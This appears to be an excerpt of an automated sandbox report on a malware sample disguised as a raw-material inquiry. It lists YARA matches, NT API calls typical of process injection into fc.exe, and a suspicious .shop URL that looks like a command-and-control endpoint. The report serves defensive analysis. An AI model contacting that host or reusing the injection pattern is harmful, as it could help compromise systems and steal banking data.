              Source: fc.exe, 00000005.00000003.2371101347.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: fc.exe, 00000005.00000002.4279422852.00000000052CC000.00000004.10000000.00040000.00000000.sdmp, gGZaaTbTIZmmI.exe, 00000006.00000002.4278982645.00000000041FC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sonixingenuine.shop/01c7/?O2=aP0Tt&88v07=YTigy0/11EA1EDEWI2qwNPkZTl2Ew25ueN49sLqr1toXUas

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 0.2.CSZ inquiry for MH raw material.exe.220000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.4277646294.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4278415007.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2174886702.00000000010E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2173707724.0000000000221000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4278497197.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4278558823.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2174955869.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0024CB43 NtClose,0_2_0024CB43
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02B60 NtClose,LdrInitializeThunk,0_2_00E02B60
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02C70 NtFreeVirtualMemory,LdrInitializeThunk,0_2_00E02C70
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02DF0 NtQuerySystemInformation,LdrInitializeThunk,0_2_00E02DF0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E035C0 NtCreateMutant,LdrInitializeThunk,0_2_00E035C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E04340 NtSetContextThread,0_2_00E04340
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E04650 NtSuspendThread,0_2_00E04650
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02AF0 NtWriteFile,0_2_00E02AF0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02AD0 NtReadFile,0_2_00E02AD0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02AB0 NtWaitForSingleObject,0_2_00E02AB0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02BE0 NtQueryValueKey,0_2_00E02BE0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02BF0 NtAllocateVirtualMemory,0_2_00E02BF0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02BA0 NtEnumerateValueKey,0_2_00E02BA0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02B80 NtQueryInformationFile,0_2_00E02B80
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02CF0 NtOpenProcess,0_2_00E02CF0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02CC0 NtQueryVirtualMemory,0_2_00E02CC0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02CA0 NtQueryInformationToken,0_2_00E02CA0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02C60 NtCreateKey,0_2_00E02C60
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02C00 NtQueryInformationProcess,0_2_00E02C00
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02DD0 NtDelayExecution,0_2_00E02DD0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02DB0 NtEnumerateKey,0_2_00E02DB0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02D30 NtUnmapViewOfSection,0_2_00E02D30
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02D00 NtSetInformationFile,0_2_00E02D00
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02D10 NtMapViewOfSection,0_2_00E02D10
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02EE0 NtQueueApcThread,0_2_00E02EE0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02EA0 NtAdjustPrivilegesToken,0_2_00E02EA0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02E80 NtReadVirtualMemory,0_2_00E02E80
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02E30 NtWriteVirtualMemory,0_2_00E02E30
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02FE0 NtCreateFile,0_2_00E02FE0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02FA0 NtQuerySection,0_2_00E02FA0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02FB0 NtResumeThread,0_2_00E02FB0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02F90 NtProtectVirtualMemory,0_2_00E02F90
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02F60 NtCreateProcessEx,0_2_00E02F60
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E02F30 NtCreateSection,0_2_00E02F30
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E03090 NtSetValueKey,0_2_00E03090
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E03010 NtOpenDirectoryObject,0_2_00E03010
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E039B0 NtGetContextThread,0_2_00E039B0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E03D70 NtOpenThread,0_2_00E03D70
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E03D10 NtOpenProcessToken,0_2_00E03D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03654340 NtSetContextThread,LdrInitializeThunk,5_2_03654340
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03654650 NtSuspendThread,LdrInitializeThunk,5_2_03654650
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652B60 NtClose,LdrInitializeThunk,5_2_03652B60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652BE0 NtQueryValueKey,LdrInitializeThunk,5_2_03652BE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_03652BF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_03652BA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652AF0 NtWriteFile,LdrInitializeThunk,5_2_03652AF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652AD0 NtReadFile,LdrInitializeThunk,5_2_03652AD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652F30 NtCreateSection,LdrInitializeThunk,5_2_03652F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652FE0 NtCreateFile,LdrInitializeThunk,5_2_03652FE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652FB0 NtResumeThread,LdrInitializeThunk,5_2_03652FB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652EE0 NtQueueApcThread,LdrInitializeThunk,5_2_03652EE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_03652E80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_03652D30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652D10 NtMapViewOfSection,LdrInitializeThunk,5_2_03652D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_03652DF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652DD0 NtDelayExecution,LdrInitializeThunk,5_2_03652DD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652C60 NtCreateKey,LdrInitializeThunk,5_2_03652C60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_03652C70
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_03652CA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036535C0 NtCreateMutant,LdrInitializeThunk,5_2_036535C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036539B0 NtGetContextThread,LdrInitializeThunk,5_2_036539B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652B80 NtQueryInformationFile,5_2_03652B80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652AB0 NtWaitForSingleObject,5_2_03652AB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652F60 NtCreateProcessEx,5_2_03652F60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652FA0 NtQuerySection,5_2_03652FA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652F90 NtProtectVirtualMemory,5_2_03652F90
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652E30 NtWriteVirtualMemory,5_2_03652E30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652EA0 NtAdjustPrivilegesToken,5_2_03652EA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652D00 NtSetInformationFile,5_2_03652D00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652DB0 NtEnumerateKey,5_2_03652DB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652C00 NtQueryInformationProcess,5_2_03652C00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652CF0 NtOpenProcess,5_2_03652CF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03652CC0 NtQueryVirtualMemory,5_2_03652CC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03653010 NtOpenDirectoryObject,5_2_03653010
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03653090 NtSetValueKey,5_2_03653090
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03653D70 NtOpenThread,5_2_03653D70
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03653D10 NtOpenProcessToken,5_2_03653D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02B593B0 NtCreateFile,5_2_02B593B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02B596B0 NtClose,5_2_02B596B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02B59610 NtDeleteFile,5_2_02B59610
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02B59520 NtReadFile,5_2_02B59520
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02B59820 NtAllocateVirtualMemory,5_2_02B59820
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00238B130_2_00238B13
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00221B910_2_00221B91
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_002210000_2_00221000
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_002228C00_2_002228C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_002220C90_2_002220C9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0024F1630_2_0024F163
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_002232050_2_00223205
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_002232100_2_00223210
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_002303130_2_00230313
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_002305330_2_00230533
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00236D0E0_2_00236D0E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00236D130_2_00236D13
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0022E5120_2_0022E512
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0022E5130_2_0022E513
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0022E6630_2_0022E663
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0022467A0_2_0022467A
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0022E6570_2_0022E657
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E620000_2_00E62000
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E881CC0_2_00E881CC
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E901AA0_2_00E901AA
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E841A20_2_00E841A2
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E581580_2_00E58158
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC01000_2_00DC0100
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6A1180_2_00E6A118
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E502C00_2_00E502C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E702740_2_00E70274
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E903E60_2_00E903E6
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DDE3F00_2_00DDE3F0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E8A3520_2_00E8A352
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E7E4F60_2_00E7E4F6
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E824460_2_00E82446
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E744200_2_00E74420
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E905910_2_00E90591
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD05350_2_00DD0535
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DEC6E00_2_00DEC6E0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCC7C00_2_00DCC7C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF47500_2_00DF4750
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD07700_2_00DD0770
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFE8F00_2_00DFE8F0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DB68B80_2_00DB68B8
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DDA8400_2_00DDA840
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD28400_2_00DD2840
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E9A9A60_2_00E9A9A6
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD29A00_2_00DD29A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DE69620_2_00DE6962
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCEA800_2_00DCEA80
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E86BD70_2_00E86BD7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E8AB400_2_00E8AB40
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC0CF20_2_00DC0CF2
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E70CB50_2_00E70CB5
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD0C000_2_00DD0C00
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCADE00_2_00DCADE0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DE8DBF0_2_00DE8DBF
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DDAD000_2_00DDAD00
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6CD1F0_2_00E6CD1F
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E8EEDB0_2_00E8EEDB
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DE2E900_2_00DE2E90
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E8CE930_2_00E8CE93
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD0E590_2_00DD0E59
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E8EE260_2_00E8EE26
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC2FC80_2_00DC2FC8
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E4EFA00_2_00E4EFA0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E44F400_2_00E44F40
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E12F280_2_00E12F28
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E72F300_2_00E72F30
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF0F300_2_00DF0F30
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E870E90_2_00E870E9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E8F0E00_2_00E8F0E0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD70C00_2_00DD70C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E7F0CC0_2_00E7F0CC
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DDB1B00_2_00DDB1B0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E9B16B0_2_00E9B16B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E0516C0_2_00E0516C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DBF1720_2_00DBF172
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E712ED0_2_00E712ED
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DEB2C00_2_00DEB2C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DED2F00_2_00DED2F0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD52A00_2_00DD52A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E1739A0_2_00E1739A
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DBD34C0_2_00DBD34C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E8132D0_2_00E8132D
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC14600_2_00DC1460
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E8F43F0_2_00E8F43F
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E995C30_2_00E995C3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6D5B00_2_00E6D5B0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E875710_2_00E87571
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E816CC0_2_00E816CC
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E156300_2_00E15630
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E8F7B00_2_00E8F7B0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD38E00_2_00DD38E0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E3D8000_2_00E3D800
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD99500_2_00DD9950
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DEB9500_2_00DEB950
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E659100_2_00E65910
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E7DAC60_2_00E7DAC6
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E15AA00_2_00E15AA0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E71AA30_2_00E71AA3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6DAAC0_2_00E6DAAC
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E43A6C0_2_00E43A6C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E8FA490_2_00E8FA49
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E87A460_2_00E87A46
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E45BF00_2_00E45BF0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E0DBF90_2_00E0DBF9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DEFB800_2_00DEFB80
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E8FB760_2_00E8FB76
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E8FCF20_2_00E8FCF2
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E49C320_2_00E49C32
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DEFDC00_2_00DEFDC0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E87D730_2_00E87D73
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD3D400_2_00DD3D40
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E81D5A0_2_00E81D5A
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD9EB00_2_00DD9EB0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00D93FD20_2_00D93FD2
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00D93FD50_2_00D93FD5
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD1F920_2_00DD1F92
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E8FFB10_2_00E8FFB1
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E8FF090_2_00E8FF09
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036DA3525_2_036DA352
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036E03E65_2_036E03E6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0362E3F05_2_0362E3F0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036C02745_2_036C0274
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036A02C05_2_036A02C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036A81585_2_036A8158
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036101005_2_03610100
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036BA1185_2_036BA118
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036D81CC5_2_036D81CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036E01AA5_2_036E01AA
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036D41A25_2_036D41A2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036B20005_2_036B2000
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036207705_2_03620770
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036447505_2_03644750
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0361C7C05_2_0361C7C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0363C6E05_2_0363C6E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036205355_2_03620535
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036E05915_2_036E0591
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036D24465_2_036D2446
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036C44205_2_036C4420
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036CE4F65_2_036CE4F6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036DAB405_2_036DAB40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036D6BD75_2_036D6BD7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0361EA805_2_0361EA80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036369625_2_03636962
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036229A05_2_036229A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036EA9A65_2_036EA9A6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036228405_2_03622840
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0362A8405_2_0362A840
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0364E8F05_2_0364E8F0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036068B85_2_036068B8
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03694F405_2_03694F40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03662F285_2_03662F28
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03640F305_2_03640F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036C2F305_2_036C2F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03612FC85_2_03612FC8
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0369EFA05_2_0369EFA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03620E595_2_03620E59
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036DEE265_2_036DEE26
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036DEEDB5_2_036DEEDB
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03632E905_2_03632E90
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036DCE935_2_036DCE93
